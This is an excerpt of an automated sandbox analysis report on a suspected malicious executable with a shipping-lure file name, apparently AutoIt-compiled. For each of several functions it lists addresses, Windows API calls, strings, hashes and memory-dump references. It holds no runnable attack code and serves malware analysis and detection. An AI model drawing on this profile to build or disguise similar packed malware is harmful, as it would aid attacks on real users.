                                                                                          • Instruction ID: 9f002af6d48010537b3d4df552b6558c16b190cea24d044658933a8e40177856
                                                                                          • Opcode Fuzzy Hash: dbd95cad79052b190883512b91f15cdd19a812dd657dc745a7adae87d007b2ab
                                                                                          • Instruction Fuzzy Hash: 5901D671780118A7CF14FBA4CA09AFE77A8FB51740F141016B906F3381EA649F0AD6B2
                                                                                          Function 00831D68 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD
                                                                                            • Part of subcall function 00833CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00833CCA
                                                                                          • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00831DD3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClassMessageNameSend_wcslen
                                                                                          • String ID: ComboBox$ListBox
                                                                                          • API String ID: 624084870-1403004172
                                                                                          • Opcode ID: 43b9fb652caef7e900efffc916ce0c5ee5d34d61f74e9c150c56b7f3f9682447
                                                                                          • Instruction ID: 3d1de77786040b96112917e58997ee791ef62edad412f50d8fd4b296b16fb496
                                                                                          • Opcode Fuzzy Hash: 43b9fb652caef7e900efffc916ce0c5ee5d34d61f74e9c150c56b7f3f9682447
                                                                                          • Instruction Fuzzy Hash: AFF0A471B51218A6DF04F7A4DC5AAFE7778FF52B54F04091AB922E33C1DAA4590882A1
                                                                                          Function 0085747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcslen
                                                                                          • String ID: 3, 3, 16, 1
                                                                                          • API String ID: 176396367-3042988571
                                                                                          • Opcode ID: 205218e6966442fd9e6a950f14e114d850bd197d821ab6f2d4cbc4b1d4599475
                                                                                          • Instruction ID: 9675db6a4dd30b16ad6064c79db4dee670c2d173874c4787de4abcbe1384f9cb
                                                                                          • Opcode Fuzzy Hash: 205218e6966442fd9e6a950f14e114d850bd197d821ab6f2d4cbc4b1d4599475
                                                                                          • Instruction Fuzzy Hash: 9DE02B42314220A192312279BCC597F5689EFC5751714182FFE85C2366EAD89D9193A5
                                                                                          Function 00830B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00830B23
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message
                                                                                          • String ID: AutoIt$Error allocating memory.
                                                                                          • API String ID: 2030045667-4017498283
                                                                                          • Opcode ID: eb38b154e1662264dc5dfc05fc563f95009c33e85855c46c3dc30ed8e5d431d3
                                                                                          • Instruction ID: 491999daea385653667b3ae9da1ba78393875e6cff37fa5f91e29466df7e9711
                                                                                          • Opcode Fuzzy Hash: eb38b154e1662264dc5dfc05fc563f95009c33e85855c46c3dc30ed8e5d431d3
                                                                                          • Instruction Fuzzy Hash: 00E0D83134534866D31036957C07F997E84EF09B20F100426F7D8D5AC38AEA245016E9
                                                                                          Function 007F0D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 007EF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,007F0D71,?,?,?,007D100A), ref: 007EF7CE
                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,007D100A), ref: 007F0D75
                                                                                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,007D100A), ref: 007F0D84
                                                                                          Strings
                                                                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 007F0D7F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                          • API String ID: 55579361-631824599
                                                                                          • Opcode ID: 4e9d4709eefc12117568a03c72072bcca4e3eaae66325c3c91f29f50d3d8c67d
                                                                                          • Instruction ID: b57839db8760e1984d4207629454a5a11ba9a3a095c7d83af724fc3fdacbc655
                                                                                          • Opcode Fuzzy Hash: 4e9d4709eefc12117568a03c72072bcca4e3eaae66325c3c91f29f50d3d8c67d
                                                                                          • Instruction Fuzzy Hash: 29E06D743003518BD7209FB8E4083667BE4BB04744F01892DEA82C6B52DBB9E4448BD1
                                                                                          Function 00843017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0084302F
                                                                                          • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00843044
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Temp$FileNamePath
                                                                                          • String ID: aut
                                                                                          • API String ID: 3285503233-3010740371
                                                                                          • Opcode ID: 9ed3724a25a9c4eae5b0fba1afb335edecd50e40022a6de77d2bce4d4b7b5622
                                                                                          • Instruction ID: 05394420553cf6d6849e509c476fd7a721a815743c1c37c917db2cd8af344fab
                                                                                          • Opcode Fuzzy Hash: 9ed3724a25a9c4eae5b0fba1afb335edecd50e40022a6de77d2bce4d4b7b5622
                                                                                          • Instruction Fuzzy Hash: 92D05E7250032867DA20A7A4EC0EFDB3B6CEB04750F0002A2BA95E2191EAF49984CAD0
                                                                                          Function 0082D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: LocalTime
                                                                                          • String ID: %.3d$X64
                                                                                          • API String ID: 481472006-1077770165
                                                                                          • Opcode ID: 576d644d69be0dcf98704effb8952d050676df48fac4c731a37694c979e7b359
                                                                                          • Instruction ID: 7f0bf38894debf48567309020e65e8cde77621b3852e102471b49e954011f32f
                                                                                          • Opcode Fuzzy Hash: 576d644d69be0dcf98704effb8952d050676df48fac4c731a37694c979e7b359
                                                                                          • Instruction Fuzzy Hash: 24D012A180926CE9CB5097E0EC498B9B77CFB08305FA48452F806D1140D628E588A761
                                                                                          Function 00862322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0086232C
                                                                                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0086233F
                                                                                            • Part of subcall function 0083E97B: Sleep.KERNEL32 ref: 0083E9F3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: FindMessagePostSleepWindow
                                                                                          • String ID: Shell_TrayWnd
                                                                                          • API String ID: 529655941-2988720461
                                                                                          • Opcode ID: 329066b72883b8cb74e59225978c16c1ab2895432cf72ceb338253a604a1fdd4
                                                                                          • Instruction ID: 15340577211a1a5209eba29a384a207224b3ee9e3939ff326af74c707f4844b4
                                                                                          • Opcode Fuzzy Hash: 329066b72883b8cb74e59225978c16c1ab2895432cf72ceb338253a604a1fdd4
                                                                                          • Instruction Fuzzy Hash: BCD0A932380300B6EAA4B770EC0FFD66A04BB00B00F014A06B686EA1D0C9E0A8018A44
                                                                                          Function 00862356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0086236C
                                                                                          • PostMessageW.USER32(00000000), ref: 00862373
                                                                                            • Part of subcall function 0083E97B: Sleep.KERNEL32 ref: 0083E9F3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: FindMessagePostSleepWindow
                                                                                          • String ID: Shell_TrayWnd
                                                                                          • API String ID: 529655941-2988720461
                                                                                          • Opcode ID: 743efaa6ec66f5fab233d3d3b5bcbd0e9705690161ca24975c200d4809948a93
                                                                                          • Instruction ID: 04b2f268cfdc88d26de5efc2af1c56b55ed464662631e0e32e2b99d863d7fcb4
                                                                                          • Opcode Fuzzy Hash: 743efaa6ec66f5fab233d3d3b5bcbd0e9705690161ca24975c200d4809948a93
                                                                                          • Instruction Fuzzy Hash: BAD0C9323813117AEAA4B770EC4FFD66A14BB54B10F015A16B696EA1D0D9E4A8018A58
                                                                                          Function 0080BDFD Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0080BE93
                                                                                          • GetLastError.KERNEL32 ref: 0080BEA1
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0080BEFC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide$ErrorLast
                                                                                          • String ID:
                                                                                          • API String ID: 1717984340-0
                                                                                          • Opcode ID: 5b20ceec94ca8c45f031a51d41ccca0ab30cbdb5266430fc90e3b1ca50e1797b
                                                                                          • Instruction ID: cfdb275476a9d0a44ba3004cff8c298c765c8569eca1ad56f6ce9e2f18793321
                                                                                          • Opcode Fuzzy Hash: 5b20ceec94ca8c45f031a51d41ccca0ab30cbdb5266430fc90e3b1ca50e1797b
                                                                                          • Instruction Fuzzy Hash: 1341B13560420AAFCF618FA5CC48ABA7BA5FF42720F154169FA59DB2E1DF308D01CB60